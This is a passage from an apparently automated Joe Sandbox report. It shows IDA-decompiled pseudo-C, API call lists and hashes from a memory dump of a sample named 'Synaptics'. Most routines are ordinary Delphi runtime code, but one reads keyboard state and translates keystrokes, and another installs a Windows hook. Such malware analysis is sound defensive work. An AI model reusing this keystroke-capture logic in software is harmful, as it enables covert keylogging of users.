                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L18:
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L17:
                                                                                                                                                                                                                            				return _t18;
                                                                                                                                                                                                                            				goto L18;
                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040E268
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32 ref: 0040E19E
                                                                                                                                                                                                                              • Part of subcall function 0040E0FC: GetCPInfo.KERNEL32(00000000,?), ref: 0040E115
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocaleStringThreadType
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1505017576-0
                                                                                                                                                                                                                            • Opcode ID: f7ab25cde628a71b1d3e7a452f9e7330cfbb9f35bc13c410db0fd2e7b91e3e0a
                                                                                                                                                                                                                            • Instruction ID: 1e0c14cada7a8142f74d55e3307cde86d26a5cdea6c2c893cd231fda4e8750a6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7ab25cde628a71b1d3e7a452f9e7330cfbb9f35bc13c410db0fd2e7b91e3e0a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C13124316443958AE720D7A7AC017663B99E762344F0888FFE484AB3D2EB7C4855876F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E00428D80(intOrPtr __eax, void* __edx) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                            				struct HDC__* _t47;
                                                                                                                                                                                                                            				intOrPtr _t54;
                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                            				struct HDC__* _t66;
                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                            				intOrPtr _t82;
                                                                                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t84 = _t86;
                                                                                                                                                                                                                            				_push(_t67);
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t33 = _v8;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
                                                                                                                                                                                                                            					return _t33;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E004259F4(_v8);
                                                                                                                                                                                                                            					_push(_t84);
                                                                                                                                                                                                                            					_push(0x428e5f);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t86;
                                                                                                                                                                                                                            					E0042A188( *((intOrPtr*)(_v8 + 0x58)));
                                                                                                                                                                                                                            					E00428BFC( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
                                                                                                                                                                                                                            					_t47 = E0042A288( *((intOrPtr*)(_v8 + 0x58)));
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L004072E0();
                                                                                                                                                                                                                            					_t66 = _t47;
                                                                                                                                                                                                                            					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
                                                                                                                                                                                                                            					if(_t81 == 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
                                                                                                                                                                                                                            					_t82 =  *((intOrPtr*)(_t54 + 0x10));
                                                                                                                                                                                                                            					if(_t82 == 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v8 + 0x60)) = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                                                                            						_push(_t82);
                                                                                                                                                                                                                            						_push(_t66);
                                                                                                                                                                                                                            						L00407440();
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
                                                                                                                                                                                                                            						_push(_t66);
                                                                                                                                                                                                                            						L00407418();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E00425CE8(_v8, _t66);
                                                                                                                                                                                                                            					_t58 =  *0x49b8ac; // 0x21e0acc
                                                                                                                                                                                                                            					E0041AFE4(_t58, _t66, _t67, _v8, _t82);
                                                                                                                                                                                                                            					_pop(_t76);
                                                                                                                                                                                                                            					 *[fs:eax] = _t76;
                                                                                                                                                                                                                            					_push(0x428e66);
                                                                                                                                                                                                                            					return E00425B60(_v8);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(0049E8C8,00000000,004244A2,00000000,00424501), ref: 004259FC
                                                                                                                                                                                                                              • Part of subcall function 004259F4: RtlLeaveCriticalSection.KERNEL32(0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A09
                                                                                                                                                                                                                              • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(00000038,0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A12
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                                                                                                                                                                                              • Part of subcall function 0042A288: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9B380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000,00000000,00428E5F), ref: 00428DD5
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00428DEE
                                                                                                                                                                                                                            • 73C9B410.GDI32(00000000,?,000000FF,00000000,00000000,00428E5F), ref: 00428E17
                                                                                                                                                                                                                            • 73C9B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,00428E5F), ref: 00428E23
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2198039625-0
                                                                                                                                                                                                                            • Opcode ID: 06edad1a3cdf261bad1c94378f0d5fdbdf9d6fe4f865de9f2575fa66755788ab
                                                                                                                                                                                                                            • Instruction ID: e9c466939ba293ac9df73ed0eb373398a4389f67f4d1c2ae1c2642ffffdfa89f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06edad1a3cdf261bad1c94378f0d5fdbdf9d6fe4f865de9f2575fa66755788ab
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2314870B05624EFC704DB59D981D5EB7E4EF08324BA241AAF404AB362CB38EE40DB54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                            			E0047689C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				short _v6;
                                                                                                                                                                                                                            				char _v262;
                                                                                                                                                                                                                            				int _v268;
                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                            				struct HKL__* _t25;
                                                                                                                                                                                                                            				struct HKL__* _t28;
                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                            				unsigned int _t52;
                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                            				int _t65;
                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v272 = 0;
                                                                                                                                                                                                                            				_v268 = 0;
                                                                                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                                                                                            				_push(_t68);
                                                                                                                                                                                                                            				_push(0x47699d);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t68 + 0xfffffef4;
                                                                                                                                                                                                                            				 *0x49ec4c = GetKeyboardLayout(0);
                                                                                                                                                                                                                            				GetKeyboardState( &_v262);
                                                                                                                                                                                                                            				_t25 =  *0x49ec4c; // 0x0
                                                                                                                                                                                                                            				_t28 =  *0x49ec4c; // 0x0
                                                                                                                                                                                                                            				_t65 =  *(_t45 + 4);
                                                                                                                                                                                                                            				_t30 = ToAsciiEx(_t65, MapVirtualKeyExA(_t65, 2, _t28),  &_v262,  &_v6, 0, _t25);
                                                                                                                                                                                                                            				_t52 =  *(_t45 + 8);
                                                                                                                                                                                                                            				if((_t52 & 0x80000000) != 0) {
                                                                                                                                                                                                                            					if((_t52 >> 0x0000001f & 0x00000001) == 1 && _t30 < 1 &&  *0x49ec50 != 0) {
                                                                                                                                                                                                                            						E00404BA8();
                                                                                                                                                                                                                            						E00476A9C(_t45, _v272,  *(_t45 + 4));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(_t30 <= 0) {
                                                                                                                                                                                                                            						 *0x49ec50 =  *(_t45 + 4);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E00404BA8();
                                                                                                                                                                                                                            						E00476A9C(_t45, _v268,  *(_t45 + 4));
                                                                                                                                                                                                                            						 *0x49ec50 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t56);
                                                                                                                                                                                                                            				 *[fs:eax] = _t56;
                                                                                                                                                                                                                            				_push(0x4769a4);
                                                                                                                                                                                                                            				return E004049E4( &_v272, 2);
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyboardLayout.USER32(00000000), ref: 004768CA
                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,00000000,00000000,0047699D), ref: 004768DB
                                                                                                                                                                                                                            • MapVirtualKeyExA.USER32 ref: 004768FF
                                                                                                                                                                                                                            • ToAsciiEx.USER32(?,00000000,?,00000002,00000000,?), ref: 00476906
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Keyboard$AsciiLayoutStateVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 692081290-0
                                                                                                                                                                                                                            • Opcode ID: 369cad89c0988fd3de251049eacc826bb87c6d6fc67fae28854ac0164a97fde1
                                                                                                                                                                                                                            • Instruction ID: 89de63ba6f27cd6f45779958db8435fcd8f77a32cbffcd1c99df830e07254f94
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 369cad89c0988fd3de251049eacc826bb87c6d6fc67fae28854ac0164a97fde1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D21B1B05045049EDB10DF15CC82BEA77BAEB59310F05C4B7E988A7341DA38AD408F59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0044E7A8(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                            				int _t41;
                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t50 = _t41;
                                                                                                                                                                                                                            				_t49 = __edx;
                                                                                                                                                                                                                            				_t40 = __eax;
                                                                                                                                                                                                                            				if(E0044DEB4(__eax) == 0) {
                                                                                                                                                                                                                            					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                            				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
                                                                                                                                                                                                                            					_t27 = GetMenuItemID(_t49, _t50);
                                                                                                                                                                                                                            					_t51 = _t27;
                                                                                                                                                                                                                            					if(_t27 != 0xffffffff) {
                                                                                                                                                                                                                            						_v8 = E0044DD30(_t40, 0, _t51);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t49 = GetSubMenu(_t49, _t50);
                                                                                                                                                                                                                            					_v8 = E0044DD30(_t40, 1, _t37);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_v8 == 0) {
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *_a12 = 0;
                                                                                                                                                                                                                            					E0040A044(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
                                                                                                                                                                                                                            					return E00409F88(_a12, _t49);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$ItemStateString
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 306270399-0
                                                                                                                                                                                                                            • Opcode ID: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                                                                                                                                                                                            • Instruction ID: 91f26849067dd0ec4125c5b687d67a274517b3145466c284ab5c31d893fdeaa7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43118131A05204AFDB00EE6ECC85AAF77E8AF49364B10442AF915D7382DA39DD0197A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 55%
                                                                                                                                                                                                                            			E00474C10(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                                                                            				intOrPtr _t36;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t40;
                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                            				intOrPtr _t44;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t42 = _t43;
                                                                                                                                                                                                                            				_t44 = _t43 + 0xfffffff8;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				E00404E70(_v12);
                                                                                                                                                                                                                            				_push(_t42);
                                                                                                                                                                                                                            				_push(0x474cbf);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t44;
                                                                                                                                                                                                                            				_push(_t42);
                                                                                                                                                                                                                            				_push(0x474c8c);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t44;
                                                                                                                                                                                                                            				_t40 = LoadLibraryA(E00404E80(_v8));
                                                                                                                                                                                                                            				_t19 = FindResourceA(_t40, E00404E80(_v12), 0xa);
                                                                                                                                                                                                                            				if(_t19 != 0) {
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				FreeResource(_t19);
                                                                                                                                                                                                                            				FreeLibrary(_t40);
                                                                                                                                                                                                                            				_pop(_t35);
                                                                                                                                                                                                                            				 *[fs:eax] = _t35;
                                                                                                                                                                                                                            				_pop(_t36);
                                                                                                                                                                                                                            				 *[fs:eax] = _t36;
                                                                                                                                                                                                                            				_push(E00474CC6);
                                                                                                                                                                                                                            				return E004049E4( &_v12, 2);
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00474C8C,?,00000000,00474CBF,?,?,?,00000000), ref: 00474C54
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 00474C67
                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF,?,?,?,00000000), ref: 00474C77
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF,?,?,?,00000000), ref: 00474C7D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeLibraryResource$FindLoad
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 622515136-0
                                                                                                                                                                                                                            • Opcode ID: 842c4bf313bb0d58b6a8af23bafa00ad1df199db71c20f9afadcfabe7108ff4f
                                                                                                                                                                                                                            • Instruction ID: 3bce9edae1ef54d3e8e9fd7389a7dc52dea682d655a911964018c4ee56d4c8a4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 842c4bf313bb0d58b6a8af23bafa00ad1df199db71c20f9afadcfabe7108ff4f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC0108B0A046046FE702AB62CD129BF77ADEBC5724B21857BF804A26D1DB3C5D01C55D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E00438CE0(struct HWND__* __eax, void* __ecx) {
                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                            				struct HWND__* _t19;
                                                                                                                                                                                                                            				DWORD* _t20;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t17 = __ecx;
                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                            				_t19 = __eax;
                                                                                                                                                                                                                            				_t16 = 0;
                                                                                                                                                                                                                            				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
                                                                                                                                                                                                                            					_t9 =  *0x49eb28; // 0x21e1290
                                                                                                                                                                                                                            					if(GlobalFindAtomA(E00404E80(_t9)) !=  *0x49eb24) {
                                                                                                                                                                                                                            						_t16 = 0 | E00437E28(_t19, _t17) != 0x00000000;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t16 = 0 | GetPropA(_t19,  *0x49eb24 & 0x0000ffff) != 0x00000000;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t16;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00438CED
                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,00438D58,00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438CF6
                                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(00000000), ref: 00438D0B
                                                                                                                                                                                                                            • GetPropA.USER32 ref: 00438D22
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2582817389-0
                                                                                                                                                                                                                            • Opcode ID: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                                                                                                                                                                                            • Instruction ID: e92755073dd59f3c21f23970beea19c54b642f04f63fe31ed46c29e0623daff0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17F02761B06722539621B3775D8196F518C9E383A8B10453FF840D23C1CA2CFC42C17F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00458F44(void* __ecx) {
                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                            				DWORD* _t7;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t2 =  *0x49ebb8; // 0x21e1714
                                                                                                                                                                                                                            				if( *((char*)(_t2 + 0xa5)) == 0) {
                                                                                                                                                                                                                            					if( *0x49ebd0 == 0) {
                                                                                                                                                                                                                            						_t2 = SetWindowsHookExA(3, E00458F00, 0, GetCurrentThreadId());
                                                                                                                                                                                                                            						 *0x49ebd0 = _t2;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *0x49ebcc == 0) {
                                                                                                                                                                                                                            						_t2 = CreateEventA(0, 0, 0, 0);
                                                                                                                                                                                                                            						 *0x49ebcc = _t2;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *0x49ebd4 == 0) {
                                                                                                                                                                                                                            						_t2 = CreateThread(0, 0x3e8, E00458EA4, 0, 0, _t7);
                                                                                                                                                                                                                            						 *0x49ebd4 = _t2;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00458F5C
                                                                                                                                                                                                                            • SetWindowsHookExA.USER32 ref: 00458F6C
                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00458F87
                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 00458FAB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateThread$CurrentEventHookWindows
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1195359707-0
                                                                                                                                                                                                                            • Opcode ID: d6c3b155004564497a934944e9fb1a4da8376012889de431701f3198bbbb3ef4
                                                                                                                                                                                                                            • Instruction ID: 57ffb722b27d6620bd0413708f68fc30d075597d86d482f7219fb2c4a52a2897
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6c3b155004564497a934944e9fb1a4da8376012889de431701f3198bbbb3ef4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60F0D0B1A88301AEF710E7269C06F163655A724B1BF10413FF606791D2CFBC64888B1D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 48%
                                                                                                                                                                                                                            			E00460AA0(signed int __eax) {
                                                                                                                                                                                                                            				signed int _t1;
                                                                                                                                                                                                                            				signed int _t2;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t1 = __eax;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407638();
                                                                                                                                                                                                                            				_t2 = __eax;
                                                                                                                                                                                                                            				_push(0xc);
                                                                                                                                                                                                                            				_push(__eax);
                                                                                                                                                                                                                            				L00407380();
                                                                                                                                                                                                                            				_push(0xe);
                                                                                                                                                                                                                            				_push(__eax);
                                                                                                                                                                                                                            				L00407380();
                                                                                                                                                                                                                            				if(__eax * __eax > 8) {
                                                                                                                                                                                                                            					 *0x49c08f = 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *0x49c08f = 1;
                                                                                                                                                                                                                            				}
